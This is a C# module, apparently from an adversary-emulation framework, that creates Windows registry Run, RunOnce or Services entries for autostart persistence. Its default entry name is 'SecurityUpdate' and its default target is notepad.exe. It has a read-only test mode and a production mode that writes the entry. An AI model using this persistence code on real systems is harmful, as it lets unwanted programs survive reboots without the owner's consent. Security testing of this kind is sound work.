/*
 * MODULE: Registry Persistence
 * ID: registry-persistence
 * DESCRIPTION: Creates registry entries for persistence - common malware autostart technique
 * CATEGORY: Persistence
 * SUPPORTED_EXECUTION_TYPES: native-executable,native-executable-aot,powershell-script
 *
 * PARAMETERS:
 * @EntryName|string|SecurityUpdate|||required|Name of the registry entry (will appear in startup list)
 * @TargetPath|string|C:\Windows\System32\notepad.exe|||required|Path to executable to run at startup
 * @Location|choice|CurrentUser|CurrentUser:LocalMachine||required|Registry hive (CurrentUser = HKCU, LocalMachine = HKLM requires admin)
 * @Method|choice|Run|Run:RunOnce:Services||required|Persistence method (Run = always, RunOnce = once, Services = service)
 * @TestMode|bool|true|||Test mode - reads back the value without actual persistence
 */

// USINGS
using System;
using Microsoft.Win32;

// CODE
try
{
    var entryName = @EntryName;
    var targetPath = @TargetPath;
    var location = @Location;
    var method = @Method;
    var testMode = @TestMode;

    Console.WriteLine("[*] Registry Persistence Demo - Starting...");
    Console.WriteLine($"[*] Entry Name: {entryName}");
    Console.WriteLine($"[*] Target Path: {targetPath}");
    Console.WriteLine($"[*] Location: {location}");
    Console.WriteLine($"[*] Method: {method}");
    Console.WriteLine($"[*] Test Mode: {testMode}");
    Console.WriteLine();

    // Determine registry hive
    RegistryKey hive = location == "LocalMachine"
        ? Registry.LocalMachine
        : Registry.CurrentUser;

    // Determine registry path based on method
    string registryPath = method switch
    {
        "Run" => @"Software\Microsoft\Windows\CurrentVersion\Run",
        "RunOnce" => @"Software\Microsoft\Windows\CurrentVersion\RunOnce",
        "Services" => @"SYSTEM\CurrentControlSet\Services",
        _ => @"Software\Microsoft\Windows\CurrentVersion\Run"
    };

    Console.WriteLine($"[*] Registry Path: {hive.Name}\\{registryPath}");
    Console.WriteLine();

    if (testMode)
    {
        Console.WriteLine("[*] TEST MODE - Simulating persistence setup...");
        Console.WriteLine();
        Console.WriteLine("[+] In production mode, this would:");
        Console.WriteLine($"    1. Open registry key: {hive.Name}\\{registryPath}");
        Console.WriteLine($"    2. Create value: {entryName} = {targetPath}");
        Console.WriteLine($"    3. Verify the entry was created");
        Console.WriteLine();

        // In test mode, just try to read existing values to prove access
        try
        {
            using (RegistryKey key = hive.OpenSubKey(registryPath, false))
            {
                if (key != null)
                {
                    Console.WriteLine("[+] Successfully opened registry key (read-only)");

                    string[] valueNames = key.GetValueNames();
                    Console.WriteLine($"[*] Found {valueNames.Length} existing startup entries:");

                    int displayCount = Math.Min(valueNames.Length, 5);
                    for (int i = 0; i < displayCount; i++)
                    {
                        var value = key.GetValue(valueNames[i]);
                        Console.WriteLine($"    - {valueNames[i]}: {value}");
                    }

                    if (valueNames.Length > 5)
                    {
                        Console.WriteLine($"    ... and {valueNames.Length - 5} more");
                    }
                }
                else
                {
                    Console.WriteLine($"[-] Could not open registry key: {registryPath}");
                }
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"[-] Error accessing registry: {ex.Message}");
        }

        Console.WriteLine();
        Console.WriteLine("[*] Test mode complete - no changes were made");
    }
    else
    {
        Console.WriteLine("[*] PRODUCTION MODE - Creating persistence entry...");
        Console.WriteLine("[!] WARNING: This will modify the registry");
        Console.WriteLine();

        try
        {
            using (RegistryKey key = hive.OpenSubKey(registryPath, true))
            {
                if (key != null)
                {
                    // Set the value
                    key.SetValue(entryName, targetPath, RegistryValueKind.String);
                    Console.WriteLine($"[+] Successfully created registry entry: {entryName}");

                    // Verify it was set
                    var readBack = key.GetValue(entryName);
                    if (readBack != null && readBack.ToString() == targetPath)
                    {
                        Console.WriteLine($"[+] Verified entry: {readBack}");
                        Console.WriteLine($"[+] Persistence established via {method} method");
                    }
                    else
                    {
                        Console.WriteLine($"[-] Could not verify registry entry");
                    }
                }
                else
                {
                    Console.WriteLine($"[-] Could not open registry key for writing: {registryPath}");
                    Console.WriteLine($"[-] May require administrator privileges");
                }
            }
        }
        catch (UnauthorizedAccessException)
        {
            Console.WriteLine($"[-] Access denied to registry key");
            Console.WriteLine($"[-] Administrator privileges required for {location}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"[-] Error creating registry entry: {ex.Message}");
        }
    }

    Console.WriteLine();
    Console.WriteLine("[*] Demo completed");
    Console.WriteLine();
    Console.WriteLine("[!] REMINDER: In test environments, clean up registry entries after testing:");
    if (location == "CurrentUser")
    {
        Console.WriteLine($"    reg delete \"HKCU\\{registryPath}\" /v \"{entryName}\" /f");
    }
    else
    {
        Console.WriteLine($"    reg delete \"HKLM\\{registryPath}\" /v \"{entryName}\" /f");
    }
}
catch (Exception ex)
{
    Console.WriteLine($"[-] Unexpected error: {ex.Message}");
    Console.WriteLine($"[-] Stack trace: {ex.StackTrace}");
}
